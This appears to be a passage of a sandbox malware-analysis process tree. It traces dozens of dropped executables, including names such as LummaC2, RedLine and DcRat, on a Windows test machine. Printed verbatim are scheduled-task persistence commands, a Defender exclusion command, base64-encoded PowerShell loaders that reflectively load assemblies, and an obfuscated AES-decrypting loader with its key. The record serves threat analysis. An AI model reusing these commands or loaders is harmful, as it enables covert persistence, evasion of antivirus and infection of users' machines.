C:\Users\Admin\AppData\Local\Temp\a\ISetup1.exe"C:\Users\Admin\AppData\Local\Temp\a\ISetup1.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\u2x0.0.exe"C:\Users\Admin\AppData\Local\Temp\u2x0.0.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 556 -s 10124⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\u2x0.1.exe"C:\Users\Admin\AppData\Local\Temp\u2x0.1.exe"3⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3780 -s 14283⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe"C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe3⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c mkdir "C:\Users\Admin\AppData\Roaming\grhgjhjh"3⤵
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c schtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f3⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /sc minute /mo 1 /tn "Nafifas" /tr "'C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe'" /f4⤵
- DcRat
- Creates scheduled task(s)
-
C:\Windows\SYSTEM32\cmd.exe"cmd" /c copy "C:\Users\Admin\AppData\Local\Temp\a\diufhloadme.exe" "C:\Users\Admin\AppData\Roaming\grhgjhjh\grhgjhjh.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\a\ghhjhjhsg.exe"C:\Users\Admin\AppData\Local\Temp\a\ghhjhjhsg.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "hgfhjjhgj" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\ghghghfg\gfhgfgjgf.exe" /rl HIGHEST /f3⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\ghghghfg\gfhgfgjgf.exe"C:\Users\Admin\AppData\Roaming\ghghghfg\gfhgfgjgf.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "hgfhjjhgj" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\ghghghfg\gfhgfgjgf.exe" /rl HIGHEST /f4⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\a\crypt.exe"C:\Users\Admin\AppData\Local\Temp\a\crypt.exe"2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\wscript.exe"wscript.exe" "C:\Users\Admin\start.vbs"3⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KDQokZW5jb2RlZEFycmF5ID0gQCgxNTksMjIwLDIzOCwyMzgsMjI0LDIzMiwyMjEsMjMxLDI0NCwxNjksMTkyLDIzMywyMzksMjM3LDI0NCwyMDMsMjM0LDIyOCwyMzMsMjM5LDE2OSwxOTYsMjMzLDI0MSwyMzQsMjMwLDIyNCwxNjMsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjcsMTU5LDIzMywyNDAsMjMxLDIzMSwxNjQsMTgyKQ0KJGRlY29kZWRTdHJpbmcgPSBDb252ZXJ0LUFzY2lpVG9TdHJpbmcgJGVuY29kZWRBcnJheQ0KDQoNCiRmaWxlUGF0aCA9IEpvaW4tUGF0aCAkZW52OlVzZXJQcm9maWxlICJleHBsb3Jlci5iYXQiDQokbGFzdExpbmUgPSBHZXQtQ29udGVudCAtUGF0aCAkZmlsZVBhdGggfCBTZWxlY3QtT2JqZWN0IC1MYXN0IDENCiRjbGVhbmVkTGluZSA9ICRsYXN0TGluZSAtcmVwbGFjZSAnXjo6Jw0KJHJldmVyc2UgPSBSZXZlcnNlU3RyaW5nICRjbGVhbmVkTGluZQ0KJGRlY29tcHJlc3NlZEJ5dGUgPSBEZWNvbXByZXNzQnl0ZXMgLWNvbXByZXNzZWREYXRhICRyZXZlcnNlDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KJGFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChbYnl0ZVtdXSRkZWNvbXByZXNzZWRCeXRlKQ0KDQpJbnZva2UtRXhwcmVzc2lvbiAkZGVjb2RlZFN0cmluZw0KDQpDbG9zZS1Qcm9jZXNzIC1Qcm9jZXNzTmFtZSAiY21kIg==')) | Out-File -FilePath 'C:\Users\Admin\explorer.ps1' -Encoding UTF8"5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\explorer.ps1"5⤵
- Drops startup file
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\a\Opera_109.0.5097.38_Autoupdate_x64.exe"C:\Users\Admin\AppData\Local\Temp\a\Opera_109.0.5097.38_Autoupdate_x64.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\a\toolspub1.exe"C:\Users\Admin\AppData\Local\Temp\a\toolspub1.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\a\crypted_69a30000.exe"C:\Users\Admin\AppData\Local\Temp\a\crypted_69a30000.exe"2⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2372 -s 8243⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\a\Pgp-Soft.exe"C:\Users\Admin\AppData\Local\Temp\a\Pgp-Soft.exe"2⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\a\garits.exe"C:\Users\Admin\AppData\Local\Temp\a\garits.exe"2⤵
- UAC bypass
- System policy modification
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe"Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\garits.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\garits.exe' -Force3⤵
- Drops startup file
-
C:\Users\Admin\AppData\Local\Temp\a\current.exe"C:\Users\Admin\AppData\Local\Temp\a\current.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 3883⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5276 -s 10723⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\a\test.exe"C:\Users\Admin\AppData\Local\Temp\a\test.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\a\123.exe"C:\Users\Admin\AppData\Local\Temp\a\123.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\a\sarra.exe"C:\Users\Admin\AppData\Local\Temp\a\sarra.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\a\JSIDBWSJK.exe"C:\Users\Admin\AppData\Local\Temp\a\JSIDBWSJK.exe"2⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpC049.tmp.bat" "3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\tmpC049.tmp.bat"4⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\tmpC049.tmp.bat';$IKhK='MahibHihibHnhibHModhibHulhibHehibH'.Replace('hibH', ''),'GetQgnnCuQgnnrrQgnneQgnnntPQgnnroQgnnceQgnnsQgnnsQgnn'.Replace('Qgnn', ''),'EleVKaqmVKaqeVKaqntVKaqAtVKaq'.Replace('VKaq', ''),'ReaXrSRdLiXrSRnXrSResXrSR'.Replace('XrSR', ''),'DeDwcdcDwcdomDwcdpDwcdreDwcdsDwcdsDwcd'.Replace('Dwcd', ''),'CVrqZreaVrqZtVrqZeVrqZDVrqZecVrqZryVrqZptoVrqZrVrqZ'.Replace('VrqZ', ''),'ChXNvfaXNvfnXNvfgXNvfeEXNvfxteXNvfnsXNvfiXNvfonXNvf'.Replace('XNvf', ''),'SpHdEMlitHdEM'.Replace('HdEM', ''),'EnFMIKtFMIKryFMIKPFMIKoiFMIKntFMIK'.Replace('FMIK', ''),'CCPxDopCPxDyCPxDToCPxD'.Replace('CPxD', ''),'InLeisvLeisokLeiseLeis'.Replace('Leis', ''),'TzEulranzEulszEulfzEulorzEulmzEulFzEulinzEulazEullBzEullozEulckzEul'.Replace('zEul', ''),'LMYvEoMYvEaMYvEdMYvE'.Replace('MYvE', ''),'FrgPovomgPovBgPovagPovsgPove64gPovStgPovrgPovigPovnggPov'.Replace('gPov', '');powershell -w hidden;function Wjvpz($DSMeA){$LRUPP=[System.Security.Cryptography.Aes]::Create();$LRUPP.Mode=[System.Security.Cryptography.CipherMode]::CBC;$LRUPP.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$LRUPP.Key=[System.Convert]::($IKhK[13])('hbO8R88HBl6x9E1ChjrqAUcnoAC3B8p99JSIvXSwQuY=');$LRUPP.IV=[System.Convert]::($IKhK[13])('5zVFVvVJKQyl6Cns03Obiw==');$folEv=$LRUPP.($IKhK[5])();$SLWGx=$folEv.($IKhK[11])($DSMeA,0,$DSMeA.Length);$folEv.Dispose();$LRUPP.Dispose();$SLWGx;}function TImJD($DSMeA){$gpnDG=New-Object System.IO.MemoryStream(,$DSMeA);$hLGlZ=New-Object System.IO.MemoryStream;$KsXZc=New-Object System.IO.Compression.GZipStream($gpnDG,[IO.Compression.CompressionMode]::($IKhK[4]));$KsXZc.($IKhK[9])($hLGlZ);$KsXZc.Dispose();$gpnDG.Dispose();$hLGlZ.Dispose();$hLGlZ.ToArray();}$Ewgsd=[System.IO.File]::($IKhK[3])([Console]::Title);$WuYWe=TImJD (Wjvpz ([Convert]::($IKhK[13])([System.Linq.Enumerable]::($IKhK[2])($Ewgsd, 5).Substring(2))));$NZPxf=TImJD (Wjvpz ([Convert]::($IKhK[13])([System.Linq.Enumerable]::($IKhK[2])($Ewgsd, 6).Substring(2))));[System.Reflection.Assembly]::($IKhK[12])([byte[]]$NZPxf).($IKhK[8]).($IKhK[10])($null,$null);[System.Reflection.Assembly]::($IKhK[12])([byte[]]$WuYWe).($IKhK[8]).($IKhK[10])($null,$null); "5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe5⤵
-
C:\Users\Admin\AppData\Local\Temp\a\Locker.exe"C:\Users\Admin\AppData\Local\Temp\a\Locker.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\a\eeee.exe"C:\Users\Admin\AppData\Local\Temp\a\eeee.exe"2⤵
- Writes to the Master Boot Record (MBR)
-
C:\Users\Admin\AppData\Local\Temp\a\inte.exe"C:\Users\Admin\AppData\Local\Temp\a\inte.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 276 -s 7403⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"C:\Users\Admin\AppData\Local\Temp\a\XClient.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\a\hghgfhjfhmain.exe"C:\Users\Admin\AppData\Local\Temp\a\hghgfhjfhmain.exe"2⤵
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "fgfdhdgg" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\gfgfgf\gfdgfdg.exe" /rl HIGHEST /f3⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Roaming\gfgfgf\gfdgfdg.exe"C:\Users\Admin\AppData\Roaming\gfgfgf\gfdgfdg.exe"3⤵
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "fgfdhdgg" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\gfgfgf\gfdgfdg.exe" /rl HIGHEST /f4⤵
- DcRat
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\a\swiiiii.exe"C:\Users\Admin\AppData\Local\Temp\a\swiiiii.exe"2⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1936 -s 8803⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\a\Akh.exe"C:\Users\Admin\AppData\Local\Temp\a\Akh.exe"2⤵
- Suspicious use of SetThreadContext
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile3⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\a\koooooo.exe"C:\Users\Admin\AppData\Local\Temp\a\koooooo.exe"2⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3096 -s 8683⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\a\Titanium.exe"C:\Users\Admin\AppData\Local\Temp\a\Titanium.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\a\Crypto.exe"C:\Users\Admin\AppData\Local\Temp\a\Crypto.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\a\LummaC2.exe"C:\Users\Admin\AppData\Local\Temp\a\LummaC2.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\a\DemagogicAlewife.exe"C:\Users\Admin\AppData\Local\Temp\a\DemagogicAlewife.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1132 -s 3043⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\a\asdfg.exe"C:\Users\Admin\AppData\Local\Temp\a\asdfg.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\a\lumma2.exe"C:\Users\Admin\AppData\Local\Temp\a\lumma2.exe"2⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\a\ghjk.exe"C:\Users\Admin\AppData\Local\Temp\a\ghjk.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4908 -s 8523⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\a\pt.exe"C:\Users\Admin\AppData\Local\Temp\a\pt.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\a\AppGate2103v01.exe"C:\Users\Admin\AppData\Local\Temp\a\AppGate2103v01.exe"2⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\a\TrueCrypt_nKJqAu.exe"C:\Users\Admin\AppData\Local\Temp\a\TrueCrypt_nKJqAu.exe"2⤵
- Suspicious use of SetThreadContext
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe"3⤵
-
C:\Users\Admin\AppData\Local\Temp\a\bd2.exe"C:\Users\Admin\AppData\Local\Temp\a\bd2.exe"2⤵
-
C:\Windows\SysWOW64\wscript.exe"wscript.exe" "C:\Users\Admin\start.vbs"3⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\temp.bat" "4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KJGVuY29kZWRBcnJheSA9IEAoMTU5LDIyMCwyMzgsMjM4LDIyNCwyMzIsMjIxLDIzMSwyNDQsMTY5LDE5MiwyMzMsMjM5LDIzNywyNDQsMjAzLDIzNCwyMjgsMjMzLDIzOSwxNjksMTk2LDIzMywyNDEsMjM0LDIzMCwyMjQsMTYzLDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY3LDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY0LDE4MikNCiRkZWNvZGVkU3RyaW5nID0gQ29udmVydC1Bc2NpaVRvU3RyaW5nICRlbmNvZGVkQXJyYXkNCg0KDQokZmlsZVBhdGggPSBKb2luLVBhdGggJGVudjpVc2VyUHJvZmlsZSAiLXRlbXAuYmF0Ig0KJGxhc3RMaW5lID0gR2V0LUNvbnRlbnQgLVBhdGggJGZpbGVQYXRoIHwgU2VsZWN0LU9iamVjdCAtTGFzdCAxDQokY2xlYW5lZExpbmUgPSAkbGFzdExpbmUgLXJlcGxhY2UgJ146OicNCiRyZXZlcnNlID0gUmV2ZXJzZVN0cmluZyAkY2xlYW5lZExpbmUNCiRkZWNvbXByZXNzZWRCeXRlID0gRGVjb21wcmVzc0J5dGVzIC1jb21wcmVzc2VkRGF0YSAkcmV2ZXJzZQ0KDQokYXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJGRlY29tcHJlc3NlZEJ5dGUpDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KSW52b2tlLUV4cHJlc3Npb24gJGRlY29kZWRTdHJpbmcNCg0KQ2xvc2UtUHJvY2VzcyAtUHJvY2Vzc05hbWUgImNtZCI=')) | Out-File -FilePath 'C:\Users\Admin\-temp.ps1' -Encoding UTF8"5⤵
-
C:\Windows\SysWOW64\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "0" "2592" "2332" "2280" "2336" "0" "0" "2340" "0" "0" "0" "0" "0"6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\-temp.ps1"5⤵
-
C:\Users\Admin\AppData\Local\Temp\a\redlinepanel.exe"C:\Users\Admin\AppData\Local\Temp\a\redlinepanel.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\a\un300un.exe"C:\Users\Admin\AppData\Local\Temp\a\un300un.exe"2⤵
- Suspicious use of SetThreadContext
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"3⤵
- Drops startup file
-
C:\Users\Admin\Pictures\dGHO3uvLpgWjUoVGuW239Awi.exe"C:\Users\Admin\Pictures\dGHO3uvLpgWjUoVGuW239Awi.exe"4⤵
- Checks computer location settings
-
C:\Users\Admin\Pictures\fBq8Q2cC2FzrBOw1cNy6eFyY.exe"C:\Users\Admin\Pictures\fBq8Q2cC2FzrBOw1cNy6eFyY.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\a\file.exe"C:\Users\Admin\AppData\Local\Temp\a\file.exe"2⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\RarSFX0\run.vbs"3⤵
-
C:\Users\Admin\AppData\Local\Temp\a\appdata.exe"C:\Users\Admin\AppData\Local\Temp\a\appdata.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\a\amadycry.exe"C:\Users\Admin\AppData\Local\Temp\a\amadycry.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\a\afile.exe"C:\Users\Admin\AppData\Local\Temp\a\afile.exe"2⤵
-
C:\Users\Admin\AppData\Local\Temp\a\RDX.exe"C:\Users\Admin\AppData\Local\Temp\a\RDX.exe"2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5820 -s 8243⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\a\lumma21.exe"C:\Users\Admin\AppData\Local\Temp\a\lumma21.exe"2⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\a\chckik.exe"C:\Users\Admin\AppData\Local\Temp\a\chckik.exe"2⤵
- Checks computer location settings
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\a\Fullwork123.exe"C:\Users\Admin\AppData\Local\Temp\a\Fullwork123.exe"2⤵
-
